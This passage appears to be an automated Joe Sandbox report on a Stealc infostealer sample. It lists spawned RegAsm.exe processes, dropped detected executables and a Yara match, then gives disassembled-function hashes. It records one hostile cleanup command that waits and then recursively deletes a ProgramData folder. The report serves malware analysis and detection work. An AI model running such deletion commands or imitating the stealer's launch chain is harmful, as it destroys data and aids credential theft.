Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	03:42:15
Start date:	02/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x1d0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	03:42:15
Start date:	02/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x7ff71e800000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	03:42:15
Start date:	02/10/2024
Path:	C:\ProgramData\CBFIIEHJDB.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\CBFIIEHJDB.exe"
Imagebase:	0x2a0000
File size:	423'840 bytes
MD5 hash:	237AF39F8B579AAD0205F6174BB96239
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 61%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	03:42:15
Start date:	02/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	03:42:17
Start date:	02/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x3c0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	03:42:17
Start date:	02/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x510000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	03:42:17
Start date:	02/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xa80000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	03:42:18
Start date:	02/10/2024
Path:	C:\ProgramData\KEHDBAEGII.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\KEHDBAEGII.exe"
Imagebase:	0xde0000
File size:	344'992 bytes
MD5 hash:	022CC85ED0F56A3F3E8AEC4AE3B80A71
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 55%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	03:42:18
Start date:	02/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	03:42:19
Start date:	02/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x290000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	03:42:19
Start date:	02/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xd80000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002D.00000002.2959845385.000000000122A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	03:42:23
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BKFCAFCFBAEH" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	03:42:23
Start date:	02/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	03:42:23
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0xf10000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	03:42:32
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userDHDAFBFCFH.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	03:42:32
Start date:	02/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	03:42:32
Start date:	02/10/2024
Path:	C:\Users\userDHDAFBFCFH.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\userDHDAFBFCFH.exe"
Imagebase:	0x570000
File size:	423'840 bytes
MD5 hash:	237AF39F8B579AAD0205F6174BB96239
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 61%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	03:42:32
Start date:	02/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	03:42:33
Start date:	02/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userCAAKKFHCFI.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	03:42:33
Start date:	02/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	03:42:34
Start date:	02/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x60000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	03:42:34
Start date:	02/10/2024
Path:	C:\Users\userCAAKKFHCFI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\userCAAKKFHCFI.exe"
Imagebase:	0x770000
File size:	391'072 bytes
MD5 hash:	C7E7CFC3ED17AEF6C67C265389593EE3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 61%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	03:42:34
Start date:	02/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x250000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	03:42:34
Start date:	02/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	03:42:34
Start date:	02/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xa20000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 02AD0E48 Relevance: .4, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d82d13f022b3a617f9d43a995b7d001600e013f3540321e4ee65fb425c09c88d
Instruction ID: 819c081f89805bd856394d0a85311d4e2e92fd939e27dca5f28312da7b1058fb
Opcode Fuzzy Hash: d82d13f022b3a617f9d43a995b7d001600e013f3540321e4ee65fb425c09c88d
Instruction Fuzzy Hash: 9302EB74A012049FCB05DF68D484A9DBBF6FF89320F098599E80AEB365DB31ED85CB50

Function 02AD2664 Relevance: .5, Instructions: 535COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf21dc7e6451263239dc70450d3c41e29010fc9313158a45be592494962ff904
Instruction ID: d580a8c17a5bc3547985e489596f72484755fbd0f3a637772398d26f6bee9065
Opcode Fuzzy Hash: cf21dc7e6451263239dc70450d3c41e29010fc9313158a45be592494962ff904
Instruction Fuzzy Hash: 7F2157B1D00248DFDB24CFA9C895BDEBFB5AF49300F14805AE846A7251DB749845CF60

Function 02AD1754 Relevance: .4, Instructions: 441COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bab94e447eed9e779cbe31c75f1324c33bd4d1e5a7b52e091e5992bb68bd36ab
Instruction ID: 41608caad6348a6a507199072a05d2bfa1a4420a6d451b9bae679f32904be77e
Opcode Fuzzy Hash: bab94e447eed9e779cbe31c75f1324c33bd4d1e5a7b52e091e5992bb68bd36ab
Instruction Fuzzy Hash: 8021BB71D05258EFCF04EBB8D9805DDBFF6AF8A300F1880A6E402A7265DB301D84CBA1

Function 02AD16A5 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20b4ee5eade3fce68ed1615ef384476968147f83165c24ba332584f69e1fd2d8
Instruction ID: 79cfab38639852e6dc05e488f21b2300249c87e9a031d398a50e6714be0d42d7
Opcode Fuzzy Hash: 20b4ee5eade3fce68ed1615ef384476968147f83165c24ba332584f69e1fd2d8
Instruction Fuzzy Hash: 3821D175D05248EFCF05EBA8D9805DDBFB6EF89300F1484A6E402A7225DB705C88CB61

Function 02AD173D Relevance: .4, Instructions: 398COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2befee105d51787f740662b51f69e933829261612603d777fb665279882e8774
Instruction ID: ed89927aee491f8644e5e43893d2bed9bb95b56f0cb0d8a1dd2aa7f7b16c2b3e
Opcode Fuzzy Hash: 2befee105d51787f740662b51f69e933829261612603d777fb665279882e8774
Instruction Fuzzy Hash: DD21B231D05259EFDB05EBB8D9845DDBFB6AF8A300F1481A6D402AB255DB311D84CBA1

Function 02AD0E20 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a1dca2d67ecb91ee9f69a343aeb6c40104f809e78ca4c70dbecd4bbc9c2d65b
Instruction ID: f98a22d093a4db122df683368e42ce533ed92de0839dec8033ed32977af0e68a
Opcode Fuzzy Hash: 2a1dca2d67ecb91ee9f69a343aeb6c40104f809e78ca4c70dbecd4bbc9c2d65b
Instruction Fuzzy Hash: 82B15B35A012049FCB05DF68D484A9DBBF2FF89320F098599E406EB365DB31ED85CB90

Function 02AD2278 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dff6ba16892e88b1e3f87c3a2f9a76679b18fdac1b2d2f0c5d896b0edf928bdc
Instruction ID: eb727c05978b95e890526f03cc36d3de78caa621252335a79c479454717b3b63
Opcode Fuzzy Hash: dff6ba16892e88b1e3f87c3a2f9a76679b18fdac1b2d2f0c5d896b0edf928bdc
Instruction Fuzzy Hash: A15138B1E00258CFDB14CFA9D9857DEBBF1BF88314F148129D816AB255DB74A942CF90

Function 02AD226E Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bb0093860173d1b86e63971275c51856056e899e3fcf4cb5973843b8b7bc8
Instruction ID: e30ff84fb891d40ea50572c497acb5069fc8268476f28a4f1132b38bb83f8e5c
Opcode Fuzzy Hash: c40bb0093860173d1b86e63971275c51856056e899e3fcf4cb5973843b8b7bc8
Instruction Fuzzy Hash: 475178B0E00258CFDB24CFA9C985BDEBBF1BF48304F14812AD856AB255DB749842CF91

Function 02AD2468 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c2a833893a2470bb68e96e78b5640efbdb9ca505d9ba6d89fa910be84a23ebf
Instruction ID: d585742079190ae37242a5d06f4af6c119b0a8936c2e37f88fe2ba103e1925fc
Opcode Fuzzy Hash: 2c2a833893a2470bb68e96e78b5640efbdb9ca505d9ba6d89fa910be84a23ebf
Instruction Fuzzy Hash: 41514BB1E00358CFDB14CFA9D9A4B9DBBF1AF88314F148129D81AA7254DB389942CF90

Function 02AD245E Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9958bef6f00123d6c9f3b676f349c908c64181fe7a6aa97a249c2353b24c0385
Instruction ID: 2986a52fadc046a5cca84cac4427ae6fb39864bd78a5bc62dd51ff3cb750f5ad
Opcode Fuzzy Hash: 9958bef6f00123d6c9f3b676f349c908c64181fe7a6aa97a249c2353b24c0385
Instruction Fuzzy Hash: AA414BB0D002589FDB10CFA9C9A5B9EBFF1AF48704F148129D85AEB255DB789942CF90

Function 02AD1F08 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 696a0ebf03bb51bfe8c316f60868da148eff89795796872f6816b552c431b7e8
Instruction ID: 56b3a07a68c1508606e0c726e968196e6e27aee6383b0ff362c7258ffbc8eb8a
Opcode Fuzzy Hash: 696a0ebf03bb51bfe8c316f60868da148eff89795796872f6816b552c431b7e8
Instruction Fuzzy Hash: DA41D830A012019FCB15DF74D58069EBBF6AF84350F144A29E45AD73A9DF30AC45CB90

Function 02AD0B28 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38780e15e0dabe59ddf62b141ad497a66573f0b866563ac226b8e712e8733397
Instruction ID: 8648e12374aa8944b25507bea637848b9174e2f44943e65e16693a6b1fd675d0
Opcode Fuzzy Hash: 38780e15e0dabe59ddf62b141ad497a66573f0b866563ac226b8e712e8733397
Instruction Fuzzy Hash: FB41C271A047458FDB26DF28D94069EBBF2FF88340F144A5ED496EB2A5DB30AC48CB51

Function 02AD14F0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47d61a370a05c0d14f92b4040e070bb82214598163cb82087fa1c0f3267c3fc3
Instruction ID: 961076029f495f635067d8ce09e92bc3bd529964a4a2ff89d03d12c1a22b46f1
Opcode Fuzzy Hash: 47d61a370a05c0d14f92b4040e070bb82214598163cb82087fa1c0f3267c3fc3
Instruction Fuzzy Hash: 5431C771A012059FCB15DF78E94069DBBF2FF84340F148A2AE0569B265EF30AD45CB81

Function 02AD2A18 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a11ab8ba369b2e7a1269384f1c471a46fb6550fc65126b535440f354579e4dca
Instruction ID: 6743667843437dca127e567cf11cc82c51d965a9c787ffb2c09dea9288a47604
Opcode Fuzzy Hash: a11ab8ba369b2e7a1269384f1c471a46fb6550fc65126b535440f354579e4dca
Instruction Fuzzy Hash: FB3102B1D01258DFDB24CFA9D984BDEBBB5EF48310F20842AE806A7251DB74A941CB90

Function 02AD0A60 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53ffaf133cf34b22cb9f6d0908f6b8e92e892d2671c03a02d9f5acfd4372aefa
Instruction ID: 47d5e5e89547f29c8f59794f4a370de75a5a09b13a759af768a18288892905a3
Opcode Fuzzy Hash: 53ffaf133cf34b22cb9f6d0908f6b8e92e892d2671c03a02d9f5acfd4372aefa
Instruction Fuzzy Hash: 972144347004108FCB44EB39D899A2E7BE6FFCD710B6584A8E50ADB3B5CE21DC018B90

Function 02AD0A70 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb73b580e108104f304fc103334321379c3b6e38722b9fa3986f4477fc82328e
Instruction ID: 1fe94a41c0caa535f5928e2dfe16a7dad8c861fa50e7d56f91a20c43eea0f879
Opcode Fuzzy Hash: cb73b580e108104f304fc103334321379c3b6e38722b9fa3986f4477fc82328e
Instruction Fuzzy Hash: 4211F3347105108FCB88EB3DD599A2E7BE6FF89A11B6544A8E50ACB375CE71EC018B91

Function 02AD1C68 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6da212c7f7284f6f382ff39a986adaa77029a530f399e675cdcd0f82ed46140a
Instruction ID: 331889df8f06f6f615d1ab1974c6fd36ca9cffcc67726338f6c8e239d450f7b4
Opcode Fuzzy Hash: 6da212c7f7284f6f382ff39a986adaa77029a530f399e675cdcd0f82ed46140a
Instruction Fuzzy Hash: 0A116D71E01219AFCF09DBB8D9809DEBFF6AF89350F1484A6E406BB255DA305D44CB91

Function 02AD1A58 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c83949c6af2e2029f4d4fbd5c9ff2c68eb70d0482c54f181366315e1a98fe407
Instruction ID: 304625069d495b4ec04f94372432345d36cc6559ea37e695cb5600e055f0328f
Opcode Fuzzy Hash: c83949c6af2e2029f4d4fbd5c9ff2c68eb70d0482c54f181366315e1a98fe407
Instruction Fuzzy Hash: 5221A271E01219EFCF04DFB8D9809DEBFFAAF89340F1485A6E402A7214DA305D84CB61

Function 02AD0F20 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 074002f542587fbd5c29dcfebc13c8366ca5d8121de71431d912cffcddbb8764
Instruction ID: a9b9ac926a954d6fd6c7068c08d14153a75713e2eded9bd871fb5dabb5a9593f
Opcode Fuzzy Hash: 074002f542587fbd5c29dcfebc13c8366ca5d8121de71431d912cffcddbb8764
Instruction Fuzzy Hash: 07217279A052089FDB04DF98E484D9DBBF5FF48320F198095E80AAB366D730ED81CB50

Function 02AD1C58 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 662ab27a31b5806c4d1401368508af467e041fd4f664c8acbfac1fbf616cbec6
Instruction ID: 2c8399a35a5e4de37681807057e2cbd376691853275c2dd021148c9bd8bd137a
Opcode Fuzzy Hash: 662ab27a31b5806c4d1401368508af467e041fd4f664c8acbfac1fbf616cbec6
Instruction Fuzzy Hash: CD218C71E00219EFCF09DBA4DA806DDBFF6AF89350F1884A6E405BB255DB305E45CB51

Function 02AD21A2 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ca4ae65a8adca01ff9b5448fb2b4e10c019a5aba317fae2f83b8d94642c41e3
Instruction ID: dd3bc5f1699fed4c355a4da877143befae1e1ab094d236123807906d047ec76f
Opcode Fuzzy Hash: 2ca4ae65a8adca01ff9b5448fb2b4e10c019a5aba317fae2f83b8d94642c41e3
Instruction Fuzzy Hash: 68117231E047468BCB06AFB8D4544EFFBB1AFDA300710C65AD459A7215EF30A986CB90

Function 02AD21B0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0c58a6656acc076557303932dca09409c248d5b00092bf6dd592e94a3cc2708
Instruction ID: 92452c33a8b49c46fd9852e53edd76c93d6e4c93984df424bc7d3bd0ca71fd47
Opcode Fuzzy Hash: a0c58a6656acc076557303932dca09409c248d5b00092bf6dd592e94a3cc2708
Instruction Fuzzy Hash: 31114F31E0070A8BCB05AFB9D4544AFF7B6EFC9340710C619D51967214EF30A996CBD0

Function 02AD0CC1 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1675290830.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ad0000_file.jbxd

Similarity

